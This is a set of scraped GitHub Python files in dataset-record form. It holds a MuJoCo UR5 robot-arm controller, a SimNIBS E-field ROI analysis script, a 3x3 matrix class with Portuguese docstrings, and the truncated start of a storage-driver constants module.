render=render)\n else:\n result = 'No valid joint angles received, could not move EE to position.'\n self.last_movement_steps = 0\n return result\n\n\n def ik(self, ee_position):\n \"\"\"\n Method for solving simple inverse kinematic problems.\n This was developed for top down graspig, therefore the solution will be one where the gripper is \n vertical. This might need adjustment for other gripper models.\n Args:\n ee_position: List of XYZ-coordinates of the end-effector (ee_link for UR5 setup).\n Returns:\n joint_angles: List of joint angles that will achieve the desired ee position. \n \"\"\"\n\n try:\n assert len(ee_position) == 3, 'Invalid EE target! Please specify XYZ-coordinates in a list of length 3.'\n self.current_carthesian_target = ee_position.copy()\n # We want to be able to spedify the ee position in world coordinates, so subtract the position of the\n # base link. This is because the inverse kinematics solver chain starts at the base link. \n ee_position_base = ee_position - self.sim.data.body_xpos[self.model.body_name2id('base_link')]\n\n # By adding the appr. distance between ee_link and grasp center, we can now specify a world target position\n # for the grasp center instead of the ee_link\n gripper_center_position = ee_position_base + [0, -0.005, 0.16]\n # gripper_center_position = ee_position_base + [0, 0, 0.185]\n\n # initial_position=[0, *self.sim.data.qpos[self.actuated_joint_ids][self.groups['Arm']], 0]\n # joint_angles = self.ee_chain.inverse_kinematics(gripper_center_position, [0,0,-1], orientation_mode='X', initial_position=initial_position, regularization_parameter=0.05)\n joint_angles = self.ee_chain.inverse_kinematics(gripper_center_position, [0,0,-1], orientation_mode='X')\n\n prediction = self.ee_chain.forward_kinematics(joint_angles)[:3, 3] + self.sim.data.body_xpos[self.model.body_name2id('base_link')] - [0, -0.005, 0.16]\n diff = abs(prediction - ee_position)\n error = np.sqrt(diff.dot(diff))\n joint_angles = joint_angles[1:-2]\n # joint_angles = joint_angles[1:-1]\n\n # print(error)\n if error > 0.02:\n #print('Failed to find IK solution.')\n return None\n else:\n return joint_angles\n\n except Exception as e:\n print(e)\n print('Could not find an inverse kinematics solution.')\n\n def ik_2(self, pose_target):\n \"\"\"\n TODO: Implement orientation.\n \"\"\"\n target_position = pose_target[:3]\n target_position -= self.sim.data.body_xpos[self.model.body_name2id('base_link')]\n orientation = Quaternion(pose_target[3:])\n target_orientation = orientation.rotation_matrix\n target_matrix = orientation.transformation_matrix\n target_matrix[0][-1] = target_position[0]\n target_matrix[1][-1] = target_position[1]\n target_matrix[2][-1] = target_position[2]\n print(target_matrix)\n self.current_carthesian_target = pose_target[:3]\n joint_angles = self.ee_chain.inverse_kinematics_frame(target_matrix, initial_position=initial_position, orientation_mode='all')\n joint_angles = joint_angles[1:-1]\n current_finger_values = self.sim.data.qpos[self.actuated_joint_ids][6:]\n target = [*joint_angles, *current_finger_values]\n\n\n def display_current_values(self):\n \"\"\"\n Debug method, simply displays some relevant data at the time of the call.\n \"\"\"\n\n print('\\n################################################')\n print('CURRENT JOINT POSITIONS (ACTUATED)')\n print('################################################')\n for i in range(len(self.actuated_joint_ids)):\n print('Current angle for joint {}: {}'.format(self.actuators[i][3], self.sim.data.qpos[self.actuated_joint_ids][i]))\n\n print('\\n################################################')\n print('CURRENT JOINT POSITIONS (ALL)')\n print('################################################')\n for i in range(len(self.model.jnt_qposadr)):\n # for i in range(self.model.njnt):\n name = self.model.joint_id2name(i)\n print('Current angle for joint {}: {}'.format(name, self.sim.data.get_joint_qpos(name)))\n # print('Current angle for joint {}: {}'.format(self.model.joint_id2name(i), self.sim.data.qpos[i]))\n\n print('\\n################################################')\n print('CURRENT BODY POSITIONS')\n print('################################################')\n for i in range(self.model.nbody):\n print('Current position for body {}: {}'.format(self.model.body_id2name(i), self.sim.data.body_xpos[i]))\n\n print('\\n################################################')\n print('CURRENT BODY ROTATION MATRIZES')\n print('################################################')\n for i in range(self.model.nbody):\n print('Current rotation for body {}: {}'.format(self.model.body_id2name(i), self.sim.data.body_xmat[i]))\n\n print('\\n################################################')\n print('CURRENT BODY ROTATION QUATERNIONS (w,x,y,z)')\n print('################################################')\n for i in range(self.model.nbody):\n print('Current rotation for body {}: {}'.format(self.model.body_id2name(i), self.sim.data.body_xquat[i]))\n\n print('\\n################################################')\n print('CURRENT ACTUATOR CONTROLS')\n print('################################################') \n for i in range(len(self.sim.data.ctrl)):\n print('Current activation of actuator {}: {}'.format(self.actuators[i][1], self.sim.data.ctrl[i]))\n\n\n\n\n def stay(self, duration, render=True):\n \"\"\"\n Holds the current position by actuating the joints towards their current target position.\n Args:\n duration: Time in ms to hold the position.\n \"\"\"\n\n # print('Holding position!')\n starting_time = time.time()\n elapsed = 0\n while elapsed < duration:\n self.move_group_to_joint_target(max_steps=10, tolerance=0.0000001, plot=False, quiet=True, render=render)\n elapsed = (time.time() - starting_time)*1000\n # print('Moving on...')\n\n\n\n\n def add_marker(self, coordinates, label=True, size=[0.015, 0.015, 0.015], color=[1,0,0]):\n \"\"\"\n Adds a circular red marker at the coordinates, dislaying the coordinates as a label.\n Args:\n coordinates: List of XYZ-coordinates in m.\n label: If True, displays the target coordinates next to the marker\n size: List of floats specifying the radius in each direction\n color: List of floats between 0 and 1 specifying the RGB color parts\n \"\"\"\n \n if label:\n label_str = str(coordinates)\n else:\n label_str = ''\n\n rgba = np.concatenate((color, np.ones(1)))\n self.viewer.add_marker(pos=coordinates, label=label_str, size=size, rgba=rgba, type=2)\n\n @property\n def last_steps(self):\n return self.last_movement_steps\n\n\n def get_ft(self):\n ft_data=[0,0,0,0,0,0]\n for i in range(70):\n ft_data += self.sim.data.sensordata\n force_torque = [i / 70 for i in ft_data]\n ft = [round(i, 4) for i in force_torque]\n ft[1]=ft[1]+7\n return ft\n \n def change_object_palace(self, x,y,z, name):\n self.model.body_pos[self.model.body_name2id(name)]=[x, y, z]\n def change_object_shape(self, shape):\n\n if shape == 0:#tube plug\n self.model.geom_quat[self.model.geom_name2id('plug_1')]=[1., 0., 0., 0. ]\n self.model.geom_type[self.model.geom_name2id('plug_1')]=6\n self.model.geom_size[self.model.geom_name2id('plug_1')]=[0.0165, 0.04, 0.0113]\n self.model.geom_pos[self.model.geom_name2id('plug_1')]=[0, 0.01, 0.12 ]\n\n \n self.model.geom_size[self.model.geom_name2id('plug_2')]=[0.04, 0.01, 0.0165 ]\n self.model.geom_pos[self.model.geom_name2id('plug_2')]=[0, 0.05, 0.12 ]\n\n self.model.geom_quat[self.model.geom_name2id('plug_3')]=[1., 0., 0., 0. ]\n self.model.geom_type[self.model.geom_name2id('plug_3')]=6\n self.model.geom_size[self.model.geom_name2id('plug_3')]=[0.0053, 0.04, 0.0065 ]\n self.model.geom_pos[self.model.geom_name2id('plug_3')]=[-0.0259, 0.07, 0.12 ]\n \n self.model.geom_quat[self.model.geom_name2id('plug_4')]=[1., 0., 0., 0. ]\n self.model.geom_type[self.model.geom_name2id('plug_4')]=6\n self.model.geom_size[self.model.geom_name2id('plug_4')]=[0.0053, 0.04, 0.0065 ]\n self.model.geom_pos[self.model.geom_name2id('plug_4')]=[0.0279, 0.07, 0.12 ]\n\n self.model.geom_size[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.00]\n\n self.model.geom_size[self.model.geom_name2id('plug_6')] =[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_6')] = [0.0, 0.0, 0.00]\n \n elif shape == 1:#tube\n self.model.geom_size[self.model.geom_name2id('plug_1')]=[0.0065, 0.06, 0.0065 ]\n self.model.geom_pos[self.model.geom_name2id('plug_1')]=[0, 0.05, 0.12 ]\n self.model.geom_type[self.model.geom_name2id('plug_1')]=6\n self.model.geom_quat[self.model.geom_name2id('plug_1')]=[1., 0., 0., 0. ]\n \n self.model.geom_size[self.model.geom_name2id('plug_2')]=[0.0, 0.0, 0.0 ]\n self.model.geom_size[self.model.geom_name2id('plug_3')]=[0.0, 0.0, 0.0 ]\n self.model.geom_size[self.model.geom_name2id('plug_4')]=[0.0, 0.0, 0.0 ]\n self.model.geom_pos[self.model.geom_name2id('plug_2')]=[0, 0.01, 0.12 ]\n self.model.geom_pos[self.model.geom_name2id('plug_3')]=[0, 0.01, 0.12 ]\n self.model.geom_pos[self.model.geom_name2id('plug_4')]=[0, 0.01, 0.12 ]\n\n self.model.geom_size[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.00]\n\n self.model.geom_size[self.model.geom_name2id('plug_6')] =[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_6')] = [0.0, 0.0, 0.00]\n\n\n elif shape == 2:#cylinder\n self.model.body_quat[self.model.body_name2id('platt2')]=[0, 0, 0, -1 ]\n self.model.geom_size[self.model.geom_name2id('plug_1')]=[0.0225, 0.06, 0.0075 ]\n self.model.geom_pos[self.model.geom_name2id('plug_1')]=[0, 0.05, 0.12 ]\n self.model.geom_quat[self.model.geom_name2id('plug_1')]=[0, 0, 1, -1 ]\n\n self.model.geom_size[self.model.geom_name2id('plug_2')]=[0.00645, 0.06, 0.0247]\n self.model.geom_pos[self.model.geom_name2id('plug_2')]=[0, 0.05, 0.12 ]\n self.model.geom_quat[self.model.geom_name2id('plug_1')]=[1., 0., 0., 0. ]\n\n \n \n \n self.model.geom_size[self.model.geom_name2id('plug_3')]=[0.0, 0.0, 0.0 ]\n self.model.geom_size[self.model.geom_name2id('plug_4')]=[0.0, 0.0, 0.0 ]\n #self.model.geom_pos[self.model.geom_name2id('plug_2')]=[0, 0.01, 0.12 ]\n self.model.geom_pos[self.model.geom_name2id('plug_3')]=[0, 0.0, 0.0 ]\n self.model.geom_pos[self.model.geom_name2id('plug_4')]=[0, 0.0, 0.0 ]\n\n self.model.geom_size[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.00]\n\n self.model.geom_size[self.model.geom_name2id('plug_6')] =[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_6')] = [0.0, 0.0, 0.00]\n\n\n elif shape == 3:#cylinder plug\n self.model.geom_quat[self.model.geom_name2id('plug_1')]=[1., 0., 0., 0. ]\n self.model.geom_type[self.model.geom_name2id('plug_1')]=6\n self.model.geom_size[self.model.geom_name2id('plug_1')]=[0.0165, 0.04, 0.0113]\n self.model.geom_pos[self.model.geom_name2id('plug_1')]=[0, 0.01, 0.12 ]\n\n \n self.model.geom_size[self.model.geom_name2id('plug_2')]=[0.04, 0.01, 0.0165 ]\n self.model.geom_pos[self.model.geom_name2id('plug_2')]=[0, 0.05, 0.12 ]\n\n self.model.geom_quat[self.model.geom_name2id('plug_3')]=[1., 0., 0., 0. ]\n self.model.geom_type[self.model.geom_name2id('plug_3')]=6\n self.model.geom_size[self.model.geom_name2id('plug_3')]=[0.003, 0.04, 0.01 ]\n self.model.geom_pos[self.model.geom_name2id('plug_3')]=[-0.027, 0.07, 0.12 ]\n \n self.model.geom_quat[self.model.geom_name2id('plug_4')]=[1., 0., 0., 0. ]\n\n self.model.geom_size[self.model.geom_name2id('plug_4')]=[0.003, 0.04, 0.01 ]\n self.model.geom_pos[self.model.geom_name2id('plug_4')]=[0.027, 0.07, 0.12 ]\n\n\n\n self.model.geom_size[self.model.geom_name2id('plug_5')]=[0.01, 0.04, 0.003 ]\n self.model.geom_pos[self.model.geom_name2id('plug_5')]=[-0.027, 0.07, 0.12 ]\n\n self.model.geom_size[self.model.geom_name2id('plug_6')]=[0.01, 0.04, 0.003]\n self.model.geom_pos[self.model.geom_name2id('plug_6')]=[0.027, 0.07, 0.12 ]\n elif shape == 4:#cylinder plug\n self.model.geom_size[self.model.geom_name2id('plug_1')]=[0.003, 0.06, 0.003 ]\n self.model.geom_pos[self.model.geom_name2id('plug_1')]=[0, 0.05, 0.12 ]\n self.model.geom_type[self.model.geom_name2id('plug_1')]=6\n self.model.geom_quat[self.model.geom_name2id('plug_1')]=[1., 0., 0., 0. ]\n \n self.model.geom_size[self.model.geom_name2id('plug_2')]=[0.0, 0.0, 0.0 ]\n self.model.geom_size[self.model.geom_name2id('plug_3')]=[0.0, 0.0, 0.0 ]\n self.model.geom_size[self.model.geom_name2id('plug_4')]=[0.0, 0.0, 0.0 ]\n self.model.geom_pos[self.model.geom_name2id('plug_2')]=[0, 0.01, 0.12 ]\n self.model.geom_pos[self.model.geom_name2id('plug_3')]=[0, 0.01, 0.12 ]\n self.model.geom_pos[self.model.geom_name2id('plug_4')]=[0, 0.01, 0.12 ]\n\n self.model.geom_size[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.00]\n\n self.model.geom_size[self.model.geom_name2id('plug_6')] =[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_6')] = [0.0, 0.0, 0.00]\n elif shape == 5:#cylinder plug\n self.model.geom_size[self.model.geom_name2id('plug_1')]=[0.018, 0.06, 0.0065 ]\n self.model.geom_pos[self.model.geom_name2id('plug_1')]=[0, 0.05, 0.12 ]\n self.model.geom_type[self.model.geom_name2id('plug_1')]=6\n self.model.geom_quat[self.model.geom_name2id('plug_1')]=[1., 0., 0., 0. ]\n \n self.model.geom_size[self.model.geom_name2id('plug_2')]=[0.0, 0.0, 0.0 ]\n self.model.geom_size[self.model.geom_name2id('plug_3')]=[0.0, 0.0, 0.0 ]\n self.model.geom_size[self.model.geom_name2id('plug_4')]=[0.0, 0.0, 0.0 ]\n self.model.geom_pos[self.model.geom_name2id('plug_2')]=[0, 0.01, 0.12 ]\n self.model.geom_pos[self.model.geom_name2id('plug_3')]=[0, 0.01, 0.12 ]\n self.model.geom_pos[self.model.geom_name2id('plug_4')]=[0, 0.01, 0.12 ]\n\n self.model.geom_size[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_5')]=[0.0, 0.0, 0.00]\n\n self.model.geom_size[self.model.geom_name2id('plug_6')] =[0.0, 0.0, 0.0]\n self.model.geom_pos[self.model.geom_name2id('plug_6')] = [0.0, 0.0, 0.00]","repo_name":"Raoufsawas/UR5_MuJoCo","sub_path":"gym_ur5/controller/MujocoController.py","file_name":"MujocoController.py","file_ext":"py","file_size_in_byte":32927,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"70962877949","text":"#Issue: Create tsv document for all needed E-field analysis \n#Author: Filip Niemann & Steffen Riemann\n#Date: 21.09.2023\n\nimport os\nimport pathmanager\nimport pandas as pd\nfrom simnibs import sim_struct, run_simnibs, mni2subject_coords\nimport sys\nimport traceback\n\nsys.path.append(r'./SimNIBS_enhanced')\nimport Readout_E_fields_roi_and_mask as SE\n\nfrom importlib import reload\nreload(SE)\n\nfrom numpy import asarray\nimport numpy as np\nimport simnibs\nimport csv\nimport fnmatch\nfrom scipy.stats import pearsonr\n\n\n\n#Simnibs seperates it\"s mesh values in nodes of the tetraedic structure which gets optimise to get mesh and element structure, which is at the baricenter of 3 nodes.\n#The normal TDCS_1_scalar.msh has the possibility to get rois for the elements at grey matter by gropping all mesh structures labels as 2\n#These element files only contain normE fields but no normal component of the field, therefor a surface with orientation is needed\n#The fsaverage space however is such a surface made of nodes and only grey matter, only head_mesh.crop_mesh(1002) is working, but also not needed\n#The fsaverage space contains all fields in the superficial grey matter (insula etc, but noch amygdala etc.)\n\n#Get subject coordinates\n#subject coordinates are use to caculate simulations. In the overlay foder the fields are saved in MNI space\n#so USE MNI COORDINATES for readouts of fsaverage mesh files _TDCS_1_scalar_fsaverage.msh\"\n\n\n#readout_in=['sub_space','fsaverage_mni_space'] #chooses the overlay meshfile in the subject or fsaverage overlay folder, \n# E fields will be read out in this space\n\n#mask error in subject space because different sizes of rois\n\nif pathmanager.Exp=='VerFlu_HI' or pathmanager.Exp == 'VerFlu_TI' or pathmanager.Exp == 'VerFlu_Phon':\n for Session in ['Kopf','Zahl']:\n sheet= pathmanager.Exp +'_' + Session\n for region in ['IFG','M1']:\n for roi_type in ['mask','sphere']: # Use IFG or M1 mask and spheres read out \n for field_name in ['E_normal','E_norm']: # choose normal component E-field and magnitude E-field (norm E)\n for subject_space in ['mni2sub','sub']: # planned coordinates in mni space, actual in sub space\n if roi_type== 'mask': #mask error in subject space because different sizes of rois\n r=[]\n readout_in = 'fsaverage_mni_space' \n SE.Read_out_Efields(pathmanager.Exp, Session,region,field_name,subject_space,readout_in,roi_type,r)\n else: \n\n readout_in in 'fsaverage_mni_space' \n for radius in [12.5,25,37.5]: #radius in mm for 3 different radii\n r=radius\n try:\n SE.Read_out_Efields(pathmanager.Exp, Session,region,field_name,subject_space,readout_in,roi_type,r)\n except Exception:\n traceback.print_exc() \n\nelif pathmanager.Exp=='VerFlu_HM' or pathmanager.Exp == 'VerFlu_TM':\n for Session in ['Kopf','Zahl']:\n sheet= pathmanager.Exp +'_' + Session\n for region in ['M1','IFG']:\n for roi_type in ['mask','sphere']:\n for field_name in ['E_normal','E_norm']:\n for subject_space in ['mni2sub','sub']:\n if roi_type== 'mask': #mask error in subject space because different sizes of rois\n r=[]\n readout_in = 'fsaverage_mni_space' # E fields will be read out in this space\n SE.Read_out_Efields(pathmanager.Exp, Session,region,field_name,subject_space,readout_in,roi_type,r)\n else: \n #for readout_in in ['sub-space','fsaverage_mni_space']:\n readout_in in 'fsaverage_mni_space' # E fields will be read out in this space \n for radius in [12.5,25,37.5]: #radii in mm \n r=radius\n try:\n SE.Read_out_Efields(pathmanager.Exp, Session,region,field_name,subject_space,readout_in,roi_type,r)\n except Exception:\n traceback.print_exc()\n\n\n#to show how M1 montage effects IFG area uncomment and analyse this part\n\"\"\"\nif pathmanager.Exp=='VerFlu_HM' or pathmanager.Exp == 'VerFlu_TM':\n region='IFG'\n for Session in ['Kopf','Zahl']:\n sheet= pathmanager.Exp +'_' + Session\n for roi_type in ['mask','sphere']:\n for field_name in ['E_normal','E_norm']:\n for subject_space in ['mni2sub','sub']:\n if roi_type== 'mask': #mask error in subject space because different sizes of rois\n readout_in = 'fsaverage_mni_space'\n r=[]\n RE.Read_out_Efields(Experiment, Session,region,field_name,subject_space,readout_in,roi_type,r)\n else: \n #for readout_in in ['sub-space','fsaverage_mni_space']:\n readout_in in 'fsaverage_mni_space' \n for radius in [12.5,25,32.5]: #radius in mm\n r=radius\n try:\n RE.Read_out_Efields(Experiment, Session,region,field_name,subject_space,readout_in,roi_type,r)\n except Exception:\n traceback.print_exc()\n\nif pathmanager.Exp=='VerFlu_HI' or pathmanager.Exp == 'VerFlu_TI':\n region='M1'\n for Session in ['Kopf','Zahl']:\n sheet= pathmanager.Exp +'_' + Session\n for roi_type in ['mask','sphere']:\n for field_name in ['E_normal','E_norm']:\n for subject_space in ['mni2sub','sub']:\n if roi_type== 'mask': #mask error in subject space because different sizes of rois\n readout_in = 'fsaverage_mni_space'\n r=[]\n RE.Read_out_Efields(Experiment, Session,region,field_name,subject_space,readout_in,roi_type,r)\n else: \n #for readout_in in ['sub-space','fsaverage_mni_space']:\n readout_in in 'fsaverage_mni_space' \n for radius in [12.5,25,32.5]: #radius in mm\n r=radius\n try:\n RE.Read_out_Efields(Experiment, Session,region,field_name,subject_space,readout_in,roi_type,r)\n except Exception:\n traceback.print_exc()\n\"\"\"\n","repo_name":"LawsOfForm/VerFlu_Simulation_Niemann_2023","sub_path":"02_Simulation/05_Analysis_Function_ROI.py","file_name":"05_Analysis_Function_ROI.py","file_ext":"py","file_size_in_byte":6857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27102792479","text":"import math\n\nclass mat3:\n def __init__(self, a=0, b=0, c=0, d=0, e=0, f=0, g=0, h=0, i=0):\n \"\"\"\n Classe que representa uma matriz 3x3.\n\n Args:\n a (float): valor da posição (1,1) da matriz. Default é 0.\n b (float): valor da posição (1,2) da matriz. Default é 0.\n c (float): valor da posição (1,3) da matriz. Default é 0.\n d (float): valor da posição (2,1) da matriz. Default é 0.\n e (float): valor da posição (2,2) da matriz. Default é 0.\n f (float): valor da posição (2,3) da matriz. Default é 0.\n g (float): valor da posição (3,1) da matriz. Default é 0.\n h (float): valor da posição (3,2) da matriz. Default é 0.\n i (float): valor da posição (3,3) da matriz. Default é 0.\n \"\"\"\n self.a = a\n self.b = b\n self.c = c\n \n self.d = d\n self.e = e\n self.f = f\n \n self.g = g\n self.h = h\n self.i = i\n \n def __add__(self, other):\n \"\"\"\n Sobrecarga do operador + para somar duas matrizes.\n\n Args:\n other (mat3): outra matriz 3x3.\n\n Returns:\n mat3: matriz resultante da soma.\n \"\"\"\n return mat3(self.a + other.a, self.b + other.b, self.c + other.c, self.d + other.d, self.e + other.e, self.f + other.f, self.g + other.g, self.h + other.h, self.i + other.i)\n \n def __sub__(self, other):\n \"\"\"\n Sobrecarga do operador - para subtrair duas matrizes.\n\n Args:\n other (mat3): outra matriz 3x3.\n\n Returns:\n mat3: matriz resultante da subtração.\n \"\"\"\n return mat3(self.a - other.a, self.b - other.b, self.c - other.c, self.d - other.d, self.e - other.e, self.f - other.f, self.g - other.g, self.h - other.h, self.i - other.i)\n \n def __mul__(self, other):\n \"\"\"\n Sobrecarga do operador * para multiplicação por escalar ou outra matriz.\n\n Args:\n other (int, float, mat3): escalar ou outra matriz 3x3.\n\n Returns:\n mat3: matriz resultante da multiplicação.\n \n Raises:\n TypeError: se o tipo de other não for compatível.\n \"\"\"\n if isinstance(other, (int, float)):\n return mat3(self.a * other, self.b * other, self.c * other, self.d * other, self.e * other, self.f * other, self.g * other, self.h * other, self.i * other)\n elif isinstance(other, mat3):\n return mat3(\n self.a * other.a + self.b * other.d + self.c * other.g,\n self.a * other.b + self.b * other.e + self.c * other.h,\n self.a * other.c + self.b * other.f + self.c * other.i,\n \n self.d * other.a + self.e * other.d + self.f * other.g,\n self.d * other.b + self.e * other.e + self.f * other.h,\n self.d * other.c + self.e * other.f + self.f * other.i,\n \n self.g * other.a + self.h * other.d + self.i * other.g,\n self.g * other.b + self.h * other.e + self.i * other.h,\n self.g * other.c + self.h * other.f + self.i * other.i\n )\n else:\n raise TypeError(\"tipo incompativel\")\n \n def __str__(self):\n \"\"\"\n Representação em string da matriz.\n\n Returns:\n str: string que representa a matriz.\n \"\"\"\n return f\"[{self.a}, {self.b}, {self.c}]\\n[{self.d}, {self.e}, {self.f}]\\n[{self.g}, {self.h}, {self.i}]\"\n \n def det(self):\n \"\"\"\n Calcula o determinante da matriz.\n\n Returns:\n float: determinante da matriz.\n \"\"\"\n return self.a * self.e * self.i + self.b * self.f * self.g + self.c * self.d * self.h - self.c * self.e * self.g - self.b * self.d * self.i - self.a * self.f * self.h\n \n def inverse(self):\n \"\"\"\n Calcula a inversa da matriz.\n\n Returns:\n mat3: matriz inversa.\n\n Raises:\n ZeroDivisionError: se a matriz não for inversível.\n \"\"\"\n det = self.det()\n if det == 0:\n raise ZeroDivisionError(\"matriz não inversivel\")\n return mat3(\n self.e * self.i - self.f * self.h,\n self.c * self.h - self.b * self.i,\n self.b * self.f - self.c * self.e,\n \n self.f * self.g - self.d * self.i,\n self.a * self.i - self.c * self.g,\n self.c * self.d - self.a * self.f,\n \n self.d * self.h - self.e * self.g,\n self.b * self.g - self.a * self.h,\n self.a * self.e - self.b * self.d\n ) * (1/det)\n ","repo_name":"rodrigoamral/cg-atividades","sub_path":"atividade-2/src/mat3.py","file_name":"mat3.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26247843296","text":"from delfin.common import constants\n\nSTATUS_HEALTH = '1'\nSTATUS_ACTIVE = '43'\nSTATUS_RUNNING = '10'\nSTATUS_VOLUME_READY = '27'\nSTATUS_LUNCOPY_READY = '40'\nSTATUS_QOS_ACTIVE = '2'\nQOS_INACTIVATED = '45'\nLUN_TYPE = '11'\nSNAPSHOT_TYPE = '27'\nSTATUS_POOL_ONLINE = '27'\nSTATUS_STORAGE_NORMAL = '1'\nSTATUS_CTRLR_OFFLINE = '28'\nSTATUS_CTRLR_UNKNOWN = '0'\n\nPORT_TYPE_FC = '212'\nPORT_TYPE_ETH = '213'\nPORT_TYPE_SAS = '214'\nPORT_TYPE_FCOE = '252'\nPORT_TYPE_PCIE = '233'\nPORT_TYPE_BOND = '235'\n\nPORT_LOGICTYPE_HOST = '0'\nPORT_HEALTH_UNKNOWN = '0'\nPORT_HEALTH_NORMAL = '1'\nPORT_HEALTH_FAULTY = '2'\nPORT_HEALTH_ABOUTFAIL = '3'\nPORT_HEALTH_PARTIALLYDAMAGED = '4'\nPORT_HEALTH_INCONSISTENT = '9'\n\nPORT_RUNNINGSTS_UNKNOWN = '0'\nPORT_RUNNINGSTS_NORMAL = '1'\nPORT_RUNNINGSTS_RUNNING = '2'\nPORT_RUNNINGSTS_LINKUP = '10'\nPORT_RUNNINGSTS_LINKDOWN = '11'\nPORT_RUNNINGSTS_TOBERECOVERED = '33'\n\nPORT_LOGICTYPE_EXPANSION = '1'\nPORT_LOGICTYPE_MANAGEMENT = '2'\nPORT_LOGICTYPE_INTERNAL = '3'\nPORT_LOGICTYPE_MAINTENANCE = '4'\nPORT_LOGICTYPE_SERVICE = '5'\nPORT_LOGICTYPE_MAINTENANCE2 = '6'\nPORT_LOGICTYPE_INTERCONNECT = '11'\n\nPortTypeMap = {\n PORT_TYPE_FC: constants.PortType.FC,\n PORT_TYPE_FCOE: constants.PortType.FCOE,\n PORT_TYPE_ETH: constants.PortType.ETH,\n PORT_TYPE_PCIE: constants.PortType.OTHER,\n PORT_TYPE_SAS: constants.PortType.SAS,\n PORT_TYPE_BOND: constants.PortType.OTHER,\n}\n\nPortLogicTypeMap = {\n PORT_LOGICTYPE_HOST:\n constants.PortLogicalType.SERVICE,\n PORT_LOGICTYPE_EXPANSION:\n constants.PortLogicalType.OTHER,\n PORT_LOGICTYPE_MANAGEMENT:\n constants.PortLogicalType.MANAGEMENT,\n PORT_LOGICTYPE_INTERNAL:\n constants.PortLogicalType.INTERNAL,\n PORT_LOGICTYPE_MAINTENANCE:\n constants.PortLogicalType.MAINTENANCE,\n PORT_LOGICTYPE_SERVICE:\n constants.PortLogicalType.SERVICE,\n PORT_LOGICTYPE_MAINTENANCE2:\n constants.PortLogicalType.MAINTENANCE,\n PORT_LOGICTYPE_INTERCONNECT:\n constants.PortLogicalType.INTERCONNECT,\n}\n\nDISK_STATUS_UNKNOWN = '0'\nDISK_STATUS_NORMAL = '1'\nDISK_STATUS_OFFLINE = '28'\n\nDISK_TYPE_SAS = '1'\nDISK_TYPE_SATA = '2'\nDISK_TYPE_SSD = '3'\n\nDISK_LOGICTYPE_FREE = '1'\nDISK_LOGICTYPE_MEMBER = '2'\nDISK_LOGICTYPE_HOTSPARE = '3'\nDISK_LOGICTYPE_CACHE = '4'\n\nDiskPhysicalTypeMap = {\n DISK_TYPE_SATA: constants.DiskPhysicalType.SATA,\n DISK_TYPE_SAS: constants.DiskPhysicalType.SAS,\n DISK_TYPE_SSD: constants.DiskPhysicalType.SSD,\n}\n\nDiskLogicalTypeMap = {\n DISK_LOGICTYPE_FREE:\n constants.DiskLogicalType.FREE,\n DISK_LOGICTYPE_MEMBER:\n constants.DiskLogicalType.MEMBER,\n DISK_LOGICTYPE_HOTSPARE:\n constants.DiskLogicalType.HOTSPARE,\n DISK_LOGICTYPE_CACHE:\n constants.DiskLogicalType.CACHE,\n}\n\nFS_WORM_COMPLIANCE = '1'\nFS_WORM_AUDIT_LOG = '2'\nFS_WORM_ENTERPRISE = '3'\n\nFS_HEALTH_NORMAL = '1'\nFS_TYPE_THICK = '0'\nFS_TYPE_THIN = '1'\nPARENT_TYPE_POOL = 216\n\nQUOTA_NOT_ENABLED = 'INVALID_VALUE64'\nQUOTA_TYPE_TREE = '1'\nQUOTA_TYPE_USER = '2'\nQUOTA_TYPE_GROUP = '3'\n\nSECURITY_STYLE_MIXED = '0'\nSECURITY_STYLE_NATIVE = '1'\nSECURITY_STYLE_NTFS = '2'\nSECURITY_STYLE_UNIX = '3'\n\nPARENT_OBJECT_TYPE_FS = 40\nSHARE_NFS = '16401'\n\nERROR_CONNECT_TO_SERVER = -403\nERROR_UNAUTHORIZED_TO_SERVER = -401\n\nSOCKET_TIMEOUT = 52\nLOGIN_SOCKET_TIMEOUT = 4\n\nERROR_VOLUME_NOT_EXIST = 1077939726\nRELOGIN_ERROR_PASS = [ERROR_VOLUME_NOT_EXIST]\nPWD_EXPIRED = 3\nPWD_RESET = 4\n\nBLOCK_STORAGE_POOL_TYPE = '1'\nFILE_SYSTEM_POOL_TYPE = '2'\n\nSECTORS_SIZE = 512\nQUERY_PAGE_SIZE = 100\n\nTHICK_LUNTYPE = '0'\nTHIN_LUNTYPE = '1'\n\nHOST_OS = [\n constants.HostOSTypes.LINUX,\n constants.HostOSTypes.WINDOWS,\n constants.HostOSTypes.SOLARIS,\n constants.HostOSTypes.HP_UX,\n constants.HostOSTypes.AIX,\n constants.HostOSTypes.XEN_SERVER,\n constants.HostOSTypes.VMWARE_ESX,\n constants.HostOSTypes.LINUX_VIS,\n constants.HostOSTypes.WINDOWS_SERVER_2012,\n constants.HostOSTypes.ORACLE_VM,\n constants.HostOSTypes.OPEN_VMS,\n]\n\nHOST_RUNNINGSTATUS_NORMAL = '1'\nINITIATOR_RUNNINGSTATUS_UNKNOWN = '0'\nINITIATOR_RUNNINGSTATUS_ONLINE = '27'\nINITIATOR_RUNNINGSTATUS_OFFLINE = '28'\nISCSI_INITIATOR_TYPE = 222\nFC_INITIATOR_TYPE = 223\nIB_INITIATOR_TYPE = 16499\nISCSI_INITIATOR_DESCRIPTION = 'iSCSI Initiator'\nFC_INITIATOR_DESCRIPTION = 